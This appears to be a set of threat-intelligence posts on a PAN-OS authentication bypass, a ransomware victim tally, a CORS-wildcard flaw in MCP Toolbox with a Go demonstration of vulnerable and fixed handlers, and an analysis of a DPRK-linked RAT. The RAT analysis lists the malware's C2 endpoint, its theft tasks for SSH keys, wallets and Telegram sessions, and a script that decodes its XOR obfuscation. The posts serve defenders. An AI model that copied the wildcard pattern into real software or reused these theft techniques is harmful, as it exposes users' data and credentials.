- Product Line: Palo Alto Networks PAN-OS
- Affected Versions: Not publicly disclosed in the provided research. All currently deployed PAN-OS instances should be considered potentially vulnerable until specific vendor advisories clarify the scope.

The underlying operating system of many Palo Alto Networks appliances is based on a hardened Linux kernel.
While CVE-2026-0257 is an application-level authentication bypass, critical flaws can emerge at various layers, including the kernel. We discussed analogous vulnerabilities, such as a critical Linux kernel vulnerability leading to root access, in our analysis of CVE-2026-31431 Linux Root Access. This shows that a complete security posture across all layers of network devices is necessary.

### Detection

Given the absence of specific Indicators of Compromise (IoCs) or detailed attack patterns in publicly available research for CVE-2026-0257, detection strategies must focus on general anomalous activity related to authentication and access on Palo Alto Networks PAN-OS devices. Proactive monitoring and scrutiny of logs are essential to identify potential exploitation attempts or successful compromises.

- Authentication Log Monitoring: Routinely review PAN-OS authentication logs for unusual login attempts, successful logins from unfamiliar source IP addresses, and accounts accessing administrative interfaces at unusual times. Specifically, look for multiple failed authentication attempts followed by a successful one, or successful logins without any preceding authentication challenge.
- Administrative Access Auditing: Monitor for any unauthorized changes to firewall configurations, security policies, VPN settings, or user accounts. Changes initiated by unfamiliar accounts or from unexpected locations are suspicious.
- Network Flow Analysis: Analyze network traffic patterns to and from PAN-OS management interfaces and VPN portals. Look for anomalous data transfers, connections to unusual external IP addresses, or attempts to tunnel unauthorized traffic.
- System Resource Monitoring: Observe PAN-OS device performance and resource utilization. Sudden spikes in CPU, memory, or network traffic could indicate compromise and malicious activity.
- Endpoint Detection and Response (EDR) Correlation: If the PAN-OS device is integrated with an EDR solution or has internal network visibility, correlate firewall logs with EDR alerts from internal systems. A successful authentication bypass could lead to further lateral movement within the network.
- Threat Hunting: Proactively search for signs of compromise, even without specific IoCs. This involves looking for deviations from baseline behavior in network traffic, process execution on the firewall, and configuration settings.

### Remediation

The most effective remediation for CVE-2026-0257 will be the application of official patches released by Palo Alto Networks. Due to active exploitation and the critical nature of an authentication bypass, it is essential that organizations apply these patches as soon as they become available and have been tested in a pre-production environment.

- Patch Application: Monitor official Palo Alto Networks security advisories and support channels for security updates addressing CVE-2026-0257. Plan for immediate deployment of these patches across all affected PAN-OS instances following vendor guidelines.
- Access Restriction Workarounds: If patches are not immediately available, implement strict network access restrictions to the PAN-OS administrative interface and any public-facing VPN portals. Limit access to only trusted IP ranges or internal management networks. If possible, consider temporarily disabling external access to management interfaces until a patch can be applied.
- Multi-Factor Authentication (MFA): Ensure MFA is enforced for all administrative accounts and VPN users. An authentication bypass might circumvent the initial authentication step; however, MFA can provide an additional layer of defense against post-exploitation access attempts if the bypass is incomplete or leads to a different access vector.
- Network Segmentation: Review and strengthen network segmentation to minimize the blast radius in case of a PAN-OS compromise.
Isolate management networks and critical internal systems from less trusted segments.
- Continuous Monitoring and Auditing: Implement continuous monitoring of PAN-OS devices, focusing on authentication logs, administrative actions, and network traffic for any anomalies. Regularly audit configurations to detect unauthorized changes.
- Incident Response Preparedness: Ensure incident response plans are updated to include procedures for addressing a compromised network perimeter device. This includes steps for forensic investigation, containment, eradication, and recovery.

### Technical Takeaways

- CVE-2026-0257 is a critical authentication bypass vulnerability impacting Palo Alto Networks PAN-OS.
- The vulnerability is confirmed to be under active exploitation by threat actors, which means immediate risk.
- Successful exploitation grants unauthorized access to PAN-OS devices, potentially leading to administrative control and network compromise.
- Specific affected versions and a CVSS score have not been publicly disclosed in the provided research. This requires a broad assessment and proactive defense.
- Immediate application of vendor-provided patches, coupled with strict access controls and monitoring, is essential for all PAN-OS deployments.

---

## Genesis Group Leads Ransomware Activity with 5 Victims

- URL: https://purple-ops.io/blog/genesis-group-ransomware-victims
- Date: 2026-05-31
- Category: Ransomware Report
- Tags: none
- Reading time: 5 min

**Summary:** The Genesis Group led recent ransomware activity, claiming 5 new victims across diverse US sectors like construction, retail, and education.

### Statistical Overview

**Victim Totals**

- This month: 767
- This quarter: 1544
- Year to date: 4169
- Last 24h: 7

**Quarterly Breakdown:** Q1: 2631 | Q2: 1544 | Q3: 0 | Q4: 0

Ransomware activity totaled 7 new victims in the last 24 hours. The Genesis group accounted for most incidents during this period.
### Introduction

In the last 24 hours, seven new ransomware victims were reported across various sectors and geographies. The Genesis group was the most active, responsible for five incidents, while CMD and Krybit each claimed one victim. Affected sectors include Construction & Engineering, Retail & Ecommerce, Education, Healthcare, Investment Banking, Lubricants, and Residential Remodeling, primarily impacting organizations in the United States.

### Ransomware Summary Table

| # | Group | Victims (24h) | Sample Victims | Geos | Sectors |
|---|---|---|---|---|---|
| 1 | Genesis | 5 | A roettgers, Cavalier flooring systems inc., Cedar street capital (a part of a cynvestors limited partnership) (+2) | United States | Construction & Engineering, Retail & Ecommerce |
| 2 | CMD | 1 | Lake Washington School District | United States | Education |
| 3 | Krybit | 1 | Tulipmediworld.com | India | Healthcare |

The Genesis group was responsible for five recent ransomware victims, primarily in the United States, targeting industries such as construction, retail, and investment banking. CMD ransomware affected the Education sector, attacking Lake Washington School District. Krybit claimed one victim in the Healthcare sector in India.

### Victim Distribution

**By Country**

- United States: 6
- India: 1

**By Industry**

- Home Improvement & Hardware Retail: 2
- Healthcare: 1
- Education: 1
- Investment Banking: 1
- Lubricants: 1
- Residential Remodeling: 1

The United States experienced the most ransomware attacks, accounting for most new victims. Targeting showed a broad approach across various industries, including retail, construction, education, and healthcare, without concentrating on a single vertical.

### Ransomware News

**Topline:** Threat intelligence indicates a rising risk to critical infrastructure, with a shift from cyber espionage to physical disruption.

**Campaigns & Operations:** Attackers are increasingly exploiting internet-exposed industrial systems, default passwords, and outdated configurations, with small utilities and local municipalities facing disproportionate risk.
Historical instances include destructive wiper attacks, post-breach cleanups, Iranian-affiliated PLC exploitation, and telecom intrusions. The United States experiences a 62% higher cyber-attack frequency compared to the global average.

**Vulnerabilities & TTPs:** Exploitation uses weaknesses like default passwords and unpatched systems. Artificial intelligence is integrated into intrusion lifecycles, handling 80-90% of operational tasks in some campaigns, which improves attack automation and efficiency.

**Analyst Note:** This trend shows a rising frequency of sophisticated attacks with real-world consequences. It requires strong OT/ICS security measures and coordinated defense strategies.

### Technical Takeaways

- The Genesis group accounted for the majority of new ransomware incidents, with five victims in the last 24 hours.
- Organizations in the United States were overwhelmingly targeted, comprising six out of seven reported victims.
- Ransomware groups show broad targeting across diverse industries, including construction, retail, education, and healthcare.
- Critical infrastructure and industrial control systems face escalating threats, with attackers increasingly focused on physical disruption rather than just data exfiltration.
- Artificial intelligence is used to automate a significant portion of intrusion lifecycles, showing a change in threat actor methods.
- The continued targeting of organizations in the investment banking sector indicates ongoing financial sector risks.

### Genesis Group Tactics and Target Profile

The Genesis ransomware group has demonstrated a consistent pattern of targeting small-to-mid-sized US businesses across diverse industries.
Their recent activity highlights several concerning trends:

- Sector diversity: Targets span construction, retail, investment banking, and residential services
- Geographic focus: Predominantly United States-based victims
- Volume consistency: Five victims in a single 24-hour window indicates an active and organized operation
- Business size: Targets appear to include both regional firms and larger corporate entities

Organizations in these sectors should review their ransomware readiness immediately. See also: Ransomware Group Profiles for detailed threat actor analysis.

### How Organizations Can Defend Against Genesis Group Attacks

Defending against groups like Genesis requires a layered security approach. Security teams should prioritize the following actions:

- Patch management: Ensure all internet-facing systems are updated to close known vulnerabilities
- Endpoint detection: Deploy EDR solutions capable of identifying ransomware behavior before encryption begins
- Backup integrity: Maintain offline, immutable backups tested regularly for restoration
- Employee training: Phishing remains a primary initial access vector for ransomware operators
- Incident response planning: Establish documented playbooks for ransomware scenarios

Proactive defense reduces dwell time and limits the blast radius of any successful intrusion. Related reading: Ransomware Incident Response Guide.

### Recent Ransomware Trends Across Active Groups

Beyond Genesis, the broader ransomware landscape remains highly active. CMD's targeting of the Lake Washington School District reflects a troubling continuation of attacks on educational institutions, which often lack mature security programs. Krybit's victim in India's healthcare sector underscores that ransomware is a global threat with no industry immune.
- Education: Frequently targeted due to limited IT budgets and large user bases
- Healthcare: High-value data and operational urgency make hospitals prime targets
- Emerging groups: Smaller operators like CMD and Krybit are filling gaps left by disrupted major gangs

Monitor the latest ransomware activity feed for real-time updates on emerging group behavior.

---

## MCP Toolbox CVE-2026-9739 (CVSS 9.4) Hijacking Flaw

- URL: https://purple-ops.io/blog/cve-2026-9739-mcp-toolbox-hijacking
- Date: 2026-05-31
- Category: CVE Analysis
- Tags: cve-2026-9739, mcp-toolbox, session-hijacking, cors-bypass, enterprise-database
- Reading time: 5 min | CVSS: 9.4

**Summary:** MCP Toolbox CVE-2026-9739 (CVSS 9.4) is a critical flaw enabling session hijacking and data exfiltration from enterprise databases via CORS bypass.

Security researchers have recently identified CVE-2026-9739, a critical vulnerability in the open-source MCP Toolbox affecting enterprise database connectors, with a CVSS base score of 9.4. This flaw enables malicious actors to bypass security controls by exploiting a hardcoded access control wildcard header, overriding critical Cross-Origin Resource Sharing (CORS) policies. As a direct consequence, unauthorized external connections to local servers running the MCP Toolbox become possible.

The vulnerability stems from a fundamental development oversight in the tool's Server-Sent Events handler. While developers intended to implement strict origin flags for security, an inadvertently retained permissive header bypasses these controls. This architectural flaw permits unauthorized connections to the local server, which risks enterprise data integrity and confidentiality.

At the time of this publication, no confirmed active exploitation of CVE-2026-9739 in the wild has been publicly reported. However, its high CVSS score and clear exploitation vector show its criticality.
System administrators and development teams are advised to prioritize remediation to mitigate the potential for session hijacking and unauthorized data exfiltration.

### What is CVE-2026-9739 and why is it critical?

CVE-2026-9739 is a critical vulnerability impacting MCP Toolbox, an open-source software component designed to connect artificial intelligence agents and applications directly to corporate data storage systems. The vulnerability, assigned a CVSS base score of 9.4, allows attackers to circumvent established security policies, specifically Cross-Origin Resource Sharing (CORS) protections. Its criticality arises from the direct pathway it creates for malicious external entities to interact with internal enterprise resources, leading to severe compromises like session hijacking and unauthorized data access.

The core of CVE-2026-9739 lies in a misconfiguration within the MCP Toolbox's Server-Sent Events handler. Despite intentions to enforce strict origin policies, a hardcoded access control wildcard header (Access-Control-Allow-Origin: * or similar permissive declaration) was left within the initialization source code. This wildcard effectively overrides any global CORS middleware, enabling any external domain to make requests to the local server where the MCP Toolbox is deployed. The ability to bypass fundamental web security mechanisms makes this flaw highly significant, especially for systems connected to sensitive enterprise databases.

### Impact

The successful exploitation of CVE-2026-9739 carries serious consequences for enterprise networks. An attacker can achieve session hijacking, allowing them to impersonate legitimate users and execute actions within the context of their established sessions. This capability means that any actions or privileges available to the compromised user become accessible to the attacker. The vulnerability allows attackers to use the hijacked MCP Toolbox instance as an open proxy for malicious activities.
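The middleware override described above, and the fix the Remediation section calls for (deleting the hardcoded wildcard line), shown as an added Go illustration; this is example code written for this page, not the MCP Toolbox's own source, and the allowlisted origin, the /sse path and the hostile origin are constructed values.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
)

// Origins permitted to talk to the local server. Constructed for this example;
// MCP Toolbox's real configuration is not reproduced here.
var allowedOrigins = map[string]bool{
	"http://localhost:5000": true,
}

// corsMiddleware plays the role of the "global CORS middleware" the article
// mentions: it grants Access-Control-Allow-Origin only to allowlisted origins.
func corsMiddleware(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if origin := r.Header.Get("Origin"); allowedOrigins[origin] {
			w.Header().Set("Access-Control-Allow-Origin", origin)
			w.Header().Set("Vary", "Origin")
		}
		next.ServeHTTP(w, r)
	})
}

// vulnerableSSEHandler models the defect: the handler's own setup writes a
// wildcard, and because Set replaces the key, it silently discards whatever
// the middleware decided. Any origin can now read the event stream.
func vulnerableSSEHandler(w http.ResponseWriter, r *http.Request) {
	w.Header().Set("Content-Type", "text/event-stream")
	w.Header().Set("Access-Control-Allow-Origin", "*") // the hardcoded wildcard
	w.WriteHeader(http.StatusOK)
	fmt.Fprint(w, "event: endpoint\ndata: /sse/messages\n\n") // constructed SSE frame
}

// fixedSSEHandler is the remediated form: the wildcard line is deleted and
// origin policy is left entirely to the middleware.
func fixedSSEHandler(w http.ResponseWriter, r *http.Request) {
	w.Header().Set("Content-Type", "text/event-stream")
	w.WriteHeader(http.StatusOK)
	fmt.Fprint(w, "event: endpoint\ndata: /sse/messages\n\n")
}

// effectiveACAO sends one GET from `origin` through the middleware-wrapped
// handler and returns the Access-Control-Allow-Origin value a browser would
// see ("" when the header is absent).
func effectiveACAO(h http.HandlerFunc, origin string) string {
	req := httptest.NewRequest(http.MethodGet, "/sse", nil)
	req.Header.Set("Origin", origin)
	rec := httptest.NewRecorder()
	corsMiddleware(h).ServeHTTP(rec, req)
	return rec.Result().Header.Get("Access-Control-Allow-Origin")
}

// browserWouldAllow applies the browser's check for a request sent without
// credentials: the response is readable cross-origin if the header is "*" or
// exactly matches the requesting origin. A wildcard therefore suffices against
// a local endpoint that does not itself authenticate the caller.
func browserWouldAllow(acao, origin string) bool {
	return acao == "*" || acao == origin
}

func main() {
	hostile := "https://attacker.example" // constructed hostile page origin
	for _, c := range []struct {
		name string
		h    http.HandlerFunc
	}{{"vulnerable", vulnerableSSEHandler}, {"fixed", fixedSSEHandler}} {
		acao := effectiveACAO(c.h, hostile)
		fmt.Printf("%-10s ACAO=%q  cross-origin read allowed: %v\n",
			c.name, acao, browserWouldAllow(acao, hostile))
	}
}
```

Running main shows the vulnerable handler answering the hostile origin with a wildcard while the fixed handler sends no header at all, so the browser refuses the cross-origin read and the allowlisted origin is still served.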
Enterprises relying on MCP Toolbox to bridge AI applications with critical data infrastructure are particularly at risk. The direct consequence of this vulnerability is the potential for silent data exfiltration from linked databases. Malicious websites can use the hijacked toolbox to run arbitrary commands or queries on behalf of a legitimate user, facilitating unauthorized access and extraction of sensitive information. This risk extends to popular database systems, including Postgres and BigQuery. The compromise of such databases can lead to significant data breaches, regulatory penalties, and reputational damage.

The integration of MCP Toolbox within enterprise environments, often connecting to core business data, means that this vulnerability presents a direct path to an organization's most valuable assets.

### Exploitation Chain

The exploitation of CVE-2026-9739 follows a specific sequence, using a fundamental design flaw in the MCP Toolbox's architecture. The attack vector is initiated via a network connection, typically from a malicious website.

- Vulnerable Component Identification: The prerequisite for exploitation is an MCP Toolbox deployment that utilizes the older v2024-11-05 protocol specification. This version range or protocol adherence indicates the presence of the vulnerable code.
- Hardcoded Header Presence: The core of the vulnerability resides in the MCP Toolbox's Server-Sent Events handler. Despite intentions to enforce strict origin policies for security, a hardcoded access control wildcard header (Access-Control-Allow-Origin: *) remains embedded within the initialization source code. This header acts as an explicit instruction to browsers to permit cross-origin requests from any domain.
- CORS Policy Override: The presence of this permissive hardcoded header completely overrides any global Cross-Origin Resource Sharing (CORS) policies that might be configured at a higher level (e.g., via middleware or server configurations).
Instead of adhering to strict origin checks, the system unexpectedly permits unauthorized external connections to the local server where the MCP Toolbox is running.
- Malicious Website Interaction: An attacker can host a malicious website that contains JavaScript code designed to interact with the vulnerable MCP Toolbox instance. Because of the overridden CORS policy, this malicious website can successfully make requests to the victim's local MCP Toolbox server.
- Session Hijacking and Tool Execution: Through these unauthorized cross-origin requests, the malicious site can execute arbitrary tools or commands on behalf of the real user whose browser is interacting with the malicious website. This leads directly to session hijacking, where the attacker gains control over the user's session with the MCP Toolbox.
- Data Exfiltration: Once a session is hijacked, the attacker can use the compromised toolbox as an open proxy to interact with linked enterprise databases like Postgres and BigQuery. This allows for silent data exfiltration, unauthorized data modification, or various other malicious operations, all executed under the guise of the legitimate user's identity and permissions.

The absence of public Proof of Concept (PoC) code for CVE-2026-9739 at this time does not diminish its potential impact. However, the underlying mechanism is defined, providing a roadmap for potential exploit development.

While this analysis focuses on CVE-2026-9739, organizations should also remain aware of other critical, actively exploited vulnerabilities, such as CVE-2026-0257, a Palo Alto Networks PAN-OS authentication bypass flaw. Our prior analysis of this critical authentication bypass vulnerability, along with further insights into the Palo Alto Networks CVE-2026-0257 exploit, provides context on broader threats.

### Affected Products and Versions

The CVE-2026-9739 vulnerability primarily affects deployments of the MCP Toolbox that utilize a specific, older protocol specification.
Organizations should verify their current implementations against this information.

- Product: MCP Toolbox (open-source enterprise database connectors)
- Affected Protocol Specification: v2024-11-05 protocol specification. This indicates that any deployments configured to adhere to or built upon this specific protocol version are vulnerable. It implies that newer protocol specifications or versions of the MCP Toolbox have either rectified the issue or are not susceptible due to architectural changes.
- Affected Databases: While the vulnerability is in MCP Toolbox, its impact extends to any enterprise database systems connected via the affected toolbox, specifically mentioning Postgres and BigQuery.

Administrators must understand that the vulnerability's presence is tied to the underlying protocol specification being used by their MCP Toolbox instance, rather than a single explicit software version number. This requires a review of the configuration and operational parameters of deployed MCP Toolbox instances to confirm exposure.

### Detection

Detecting exploitation attempts or the presence of CVE-2026-9739 requires a multi-layered approach focusing on network anomalies, log analysis, and endpoint behavior. Given the nature of a CORS bypass leading to session hijacking and potential data exfiltration, monitoring for unusual activity is paramount.

**Network Indicators:**

- Unusual Cross-Origin Requests: Monitor network traffic for unexpected or unauthorized cross-origin requests originating from internal systems running MCP Toolbox to external, unknown, or suspicious domains. While the vulnerability allows requests to the local server, subsequent attacker actions (e.g., proxying to C2) might involve outbound connections.
- HTTP Traffic Analysis: Analyze HTTP headers for Origin and Access-Control-Allow-Origin.
While the vulnerability itself is about the server sending a permissive header, monitoring suspicious client-side Origin headers alongside responses that contain Access-Control-Allow-Origin: * could indicate an attempt to use the flaw.
- Anomalous Proxy Activity: Since an exploited toolbox can act as an open proxy, monitor for unusual proxy-like traffic patterns originating from the server hosting MCP Toolbox. This might include connections to unusual ports, protocols, or destinations that are not part of normal operational procedures.

**Log Signatures:**

- Server Access Logs: Review web server or application logs for the MCP Toolbox for requests originating from unexpected or untrusted IP addresses, especially those that result in successful authentication or data access without prior legitimate interaction.
- Database Query Logs: Monitor logs of connected databases (e.g., Postgres, BigQuery) for unusual query patterns, high volumes of data access, or queries issued from unexpected user accounts or applications. Pay attention to queries that appear automated or out of character for typical user behavior.
- CORS-related Warnings/Errors: While the vulnerability bypasses CORS, some underlying systems might still log attempts or warnings related to CORS policies if they are present at other layers, even if ultimately overridden.

**Endpoint Detection and Response (EDR) Queries:**

- Suspicious Process Execution: Look for unusual child processes being spawned by the MCP Toolbox application or its associated services. This could indicate the execution of arbitrary tools by an attacker.
- File System Modifications: Monitor for unauthorized file modifications or creations, especially in critical configuration directories or locations where the MCP Toolbox stores sensitive data or scripts.
- Network Connections by Non-Browser Processes: Query EDR logs for outbound network connections initiated by the MCP Toolbox process to external IPs or domains that are not part of its normal operation, potentially indicating C2 communication or data exfiltration.

Implementing strong logging and active monitoring for these indicators can help identify exploitation attempts early, allowing for timely incident response.

### Remediation

Remediating CVE-2026-9739 requires a direct modification to the MCP Toolbox's configuration or source code to remove the permissive access control header. This is a critical step to restore proper Cross-Origin Resource Sharing (CORS) enforcement.

**Patching:**

- Remove Hardcoded Header: The primary remediation is to remove the hardcoded access control wildcard header from the internal server file of the MCP Toolbox. This header is specifically located within the Server-Sent Events handler's initialization source code. By removing this line (e.g., Access-Control-Allow-Origin: *), the system will revert to its intended behavior, allowing global middleware or other configured security policies to manage origin permissions safely and correctly.
- Upgrade to a Secure Protocol Specification: If available, upgrade the MCP Toolbox to a version that utilizes a newer protocol specification known to be unaffected by this flaw. The vulnerability specifically targets deployments using the v2024-11-05 protocol specification, suggesting that later versions or protocols might have addressed the issue. Consult the official MCP Toolbox documentation or project repository for information on updated versions or patches.

**Workarounds and Mitigations:**

- Network Segmentation: Isolate systems running MCP Toolbox into a separate network segment with strict ingress and egress filtering. This can limit the ability of malicious external websites to directly reach the toolbox and restrict any potential outbound data exfiltration or command-and-control communication.
**Web Application Firewall (WAF):** Deploy a WAF in front of the MCP Toolbox instance. Configure the WAF to enforce strict CORS policies, blocking any cross-origin requests that do not originate from explicitly approved domains. While the hardcoded header might bypass some client-side CORS enforcement, a strong WAF can provide an additional layer of protection at the network edge.

**Principle of Least Privilege:** Ensure that the service account or user under which the MCP Toolbox operates has only the absolute minimum necessary permissions to perform its functions. This can limit the impact of a successful session hijacking, reducing an attacker's ability to exfiltrate data or execute arbitrary commands.

**Input Validation and Output Encoding:** While not directly addressing the CORS bypass, implementing stringent input validation for any data processed by MCP Toolbox and proper output encoding for any data displayed can mitigate the risk of secondary injection attacks if an attacker gains partial control.

**Monitoring:**

**Continuous Security Monitoring:** Implement continuous monitoring of network traffic, system logs, and database activity for the indicators described in the Detection section. Rapid detection of anomalous behavior is crucial for minimizing the window of compromise.

**Regular Security Audits:** Conduct regular security audits of MCP Toolbox configurations and connected database permissions to ensure adherence to security best practices and to identify any lingering vulnerabilities or misconfigurations.

Prioritizing these remediation steps is essential for protecting enterprise databases and AI applications from the risks posed by CVE-2026-9739.

### Technical Takeaways

- CVE-2026-9739 is a critical vulnerability (CVSS 9.4) in MCP Toolbox, an open-source enterprise database connector, allowing session hijacking and data exfiltration.
- The flaw originates from a hardcoded Access-Control-Allow-Origin: * header in the Server-Sent Events handler, which bypasses global Cross-Origin Resource Sharing (CORS) policies.
- Exploitation involves a malicious website initiating unauthorized external connections to the local server running the vulnerable MCP Toolbox (specifically those using the v2024-11-05 protocol specification).
- Successful exploitation can lead to execution of arbitrary tools, use of the toolbox as an open proxy, and silent data exfiltration from linked databases like Postgres and BigQuery.
- Remediation requires removing the hardcoded permissive header from the internal server file and upgrading to a secure protocol specification if available, complemented by network segmentation and strong monitoring.

---

## FAMOUS CHOLLIMA RAT Abuses HuggingFace for Exfil

- URL: https://purple-ops.io/blog/famous-chollima-huggingface-rat
- Date: 2026-05-31
- Category: Threat Intelligence
- Tags: famous-chollima, huggingface, rat, dprk, cryptocurrency-theft
- Reading time: 5 min

**Summary:** DPRK-backed FAMOUS CHOLLIMA's MicrosoftSystem64 RAT actively exfiltrates 1,097 credentials and 417 screenshots from crypto traders using HuggingFace for...

FAMOUS CHOLLIMA RAT Abuses HuggingFace for Exfil

A sophisticated multi-platform Remote Access Trojan (RAT), dubbed MicrosoftSystem64, linked to the DPRK-backed threat actor FAMOUS CHOLLIMA, is actively exploiting the open-source supply chain to target cryptocurrency traders and exfiltrate sensitive data. This advanced malware, distributed through a series of malicious npm packages, notably js-logger-pack, utilizes HuggingFace as a novel command-and-control (C2) and data exfiltration backend, making detection challenging for conventional security measures. As of a live infrastructure probe on May 28, 2026, researchers confirmed the active surveillance of multiple victims, observing the theft of 1,097 credential files and 417 screenshots from compromised systems.
The MicrosoftSystem64 RAT demonstrates a comprehensive array of capabilities, including persistent cross-platform keylogging, extensive cryptocurrency wallet and browser credential theft, Telegram session hijacking, and SSH key exfiltration. Its operational resilience is marked by rapid account rotation and infrastructure pivoting, circumventing previous takedowns. The use of a legitimate machine learning platform like HuggingFace for authenticated data uploads provides FAMOUS CHOLLIMA with a stealthy exfiltration channel, where stolen data is organized into private datasets, further obscuring the malicious traffic within expected network patterns.

This campaign underscores the persistent and evolving threat from state-sponsored actors targeting developers and high-value individuals within specialized sectors like cryptocurrency trading. Organizations engaged in software development, particularly those relying on public package registries, face an immediate need to enhance their supply chain security posture against such advanced and adaptive threats.

### How Does the MicrosoftSystem64 RAT Operate and Exfiltrate Data?

The MicrosoftSystem64 RAT, identified as an 81 MB stripped ELF binary (with Windows and macOS variants), functions as a Node.js Single Executable Application (SEA) built on Node.js v20.18.2. This packaging method allows the malware to run without requiring Node.js to be pre-installed on victim machines, while also making static analysis more difficult due to the embedded V8 runtime strings. The binary sets its process.title to MicrosoftSystem64, masquerading as a legitimate Microsoft service.

The malware's configuration, bundled from dist/config.js, includes hardcoded values obfuscated with a simple XOR cipher and an easily deciphered key: [90, 60, 126, 18, 159, 75, 109, 138].
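How an analyst strips a repeating-key XOR layer like the one described above, and how the leading key bytes can be recovered from a predictable plaintext prefix such as a `ws://` URL scheme, as an added example. This is illustration code written for this article, not code from the malware or from the researchers who analysed it; the key bytes are the ones quoted in the text, while the obfuscated sample is constructed here by applying that key to a placeholder string and is not taken from the real binary.

```python
"""Added example (not code from the malware or from the researchers who analysed
it): how an analyst strips the repeating-key XOR obfuscation described above from a
captured configuration, and how the key can be recovered from a known plaintext
prefix when it is not simply lying in the comments.

Assumptions: the key bytes are the ones quoted in the write-up; the obfuscated
sample below is constructed here by applying that key to a placeholder string,
not bytes taken from the real binary.
"""
from typing import Sequence

# Key as reported in the analysis above.
REPORTED_KEY = bytes([90, 60, 126, 18, 159, 75, 109, 138])


def xor_repeating(data: bytes, key: Sequence[int]) -> bytes:
    """XOR `data` against `key`, cycling the key; the same call encodes and decodes."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key_prefix(obfuscated: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext recovery: if the first bytes of the plaintext are
    predictable (e.g. a 'ws://' URL scheme), XORing them against the ciphertext
    yields the first len(known_plaintext) key bytes."""
    if len(known_plaintext) > len(obfuscated):
        raise ValueError("known plaintext longer than ciphertext")
    return bytes(c ^ p for c, p in zip(obfuscated, known_plaintext))


def decode_config_value(obfuscated: bytes, key: bytes = REPORTED_KEY) -> str:
    """Decode one configuration string; non-UTF-8 output is the quickest sign
    that the wrong key was used, so the decode error is left to propagate."""
    return xor_repeating(obfuscated, key).decode("utf-8")


# Constructed sample: a placeholder endpoint, obfuscated with the reported key.
SAMPLE_PLAINTEXT = "ws://c2.placeholder.invalid:8010"
SAMPLE_OBFUSCATED = xor_repeating(SAMPLE_PLAINTEXT.encode(), REPORTED_KEY)


def demo() -> dict:
    """Walk the analyst workflow: recover the leading key bytes from the 'ws://'
    prefix, check they match the reported key, then decode the value."""
    prefix = recover_key_prefix(SAMPLE_OBFUSCATED, b"ws://")
    return {
        "recovered_prefix": list(prefix),
        "prefix_matches_reported_key": prefix == REPORTED_KEY[: len(prefix)],
        "decoded": decode_config_value(SAMPLE_OBFUSCATED),
    }


if __name__ == "__main__":
    print(demo())
```

A five-byte prefix recovers five of the eight key bytes; in practice the remaining bytes come from a second predictable field (a known repository path, a port suffix) or, as in this case, from the comments the author left beside the values.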
This configuration reveals its C2 WebSocket endpoint at ws://195[.]201[.]194[.]107:8010 and details for the HuggingFace model repository jpeek998/system-releases, used for binary updates and exfiltration. The threat actor's operational security lapse is evident, as plaintext comments within the configuration disclose the actual values, simplifying deobfuscation.

### Command and Control Protocol

The MicrosoftSystem64 agent establishes a WebSocket connection to its C2 server, implementing automatic reconnection with exponential backoff. Upon connection, it sends a heartbeat message containing a unique agentId derived from the victim's platform, username, and machine identifier, facilitating operator tracking. The heartbeat interval is configured at 15 seconds, ensuring regular communication and resilience against network interruptions.

The binary is designed to accept 24 distinct task types from the C2 operator, effectively acting as a full-featured remote access trojan. This extensive command set allows for deep reconnaissance, data theft, and system manipulation.

| Task Type | Capability |
|---|---|
| scan_wallets | Enumerate and exfiltrate all cryptocurrency wallet browser extensions and standalone wallet applications. |
| scan_files | Scan the filesystem for files matching attacker-specified patterns. |
| send_tdata | Compress and upload Telegram Desktop session data. |
| download_ssh | Exfiltrate SSH keys directory, including id_rsa, id_ed25519, id_ecdsa, known_hosts, and authorized_keys. |
| exec_command | Execute arbitrary shell commands using PowerShell on Windows or /bin/sh on Unix-like systems, supporting configurable timeouts and working directories. |
| list_dir | Perform directory listings on the compromised system. |
| list_drives | Enumerate mounted drives and volumes. |
| get_system_info | Collect detailed OS, CPU, RAM, network, and user information. |
| get_folder_size | Gather reconnaissance on file and folder sizes. |
| start_input_capture | Initiate a cross-platform keylogger with clipboard capture, polling every 1 second. |
| start_screenshot_hf_upload | Enable periodic screenshot uploads to HuggingFace every 60 seconds. |
| clipboard_get | Retrieve the current contents of the system clipboard. |
| upload_folder_hf | Upload arbitrary directories to HuggingFace datasets. |

### Novel Data Exfiltration via HuggingFace

A distinguishing characteristic of MicrosoftSystem64 is its abuse of HuggingFace for data exfiltration, a technique previously documented by JFrog Research. Instead of routing stolen data through its C2 server, the RAT creates private datasets under the attacker's HuggingFace account, committing stolen files using the platform's Git LFS API. This strategy offloads storage to HuggingFace's infrastructure, making exfiltration harder to detect since traffic appears as legitimate HTTPS requests to a trusted machine learning platform. After each upload, the agent notifies the C2 server with metadata about the uploaded content, directing the operator to the specific HuggingFace dataset. The current operation leverages the HuggingFace account jpeek998, an apparent pivot from an earlier account, Lordplay.

### Comprehensive Credential and Session Theft

The malware executes a systematic _scanBrowserProfiles function, targeting credentials from 15 browser families across Windows, macOS, and Linux by searching %LOCALAPPDATA%, %APPDATA%, ~/Library/Application Support, and ~/.config paths. Before accessing credential databases, browser processes like Chrome, Brave, Firefox, Edge, Opera, and Vivaldi are forcibly terminated to release file locks.

Over 80 cryptocurrency wallet browser extensions are specifically targeted, with the malware configured to steal both extension code directories and their localStorage data. Each stolen extension's data is copied, subject to a 100 MB per-file size cap, and compressed into a gzip archive for upload. This includes extensions for major chains like Ethereum, Solana, Bitcoin, and multi-chain wallets.
For Telegram users, the handleSendTdata function targets the Telegram Desktop tdata directory, which contains session keys enabling full account takeover. The tdata directory is gzipped and uploaded to HuggingFace, accompanied by the victim's OS, IP address, and username as metadata. Additionally, the download_ssh task specifically exfiltrates the entire ~/.ssh directory, packaging and uploading crucial files like id_rsa, id_ed25519, id_ecdsa, known_hosts, and authorized_keys to a dedicated HuggingFace dataset.

### Persistent Surveillance and Self-Update

The MicrosoftSystem64 RAT integrates a cross-platform keylogger using native OS-level input capture APIs. On Windows, it leverages SetWindowsHookEx; on macOS, it employs Core Graphics CGEventTap; and on Linux, it attempts xinput test-xi2 before falling back to raw /dev/input evdev reading. This keylogger operates in conjunction with a clipboard watcher that polls every second, capturing sensitive textual data. Furthermore, the malware supports both on-demand and periodic screenshot capture across all platforms, uploading images to HuggingFace every 60 seconds when enabled.

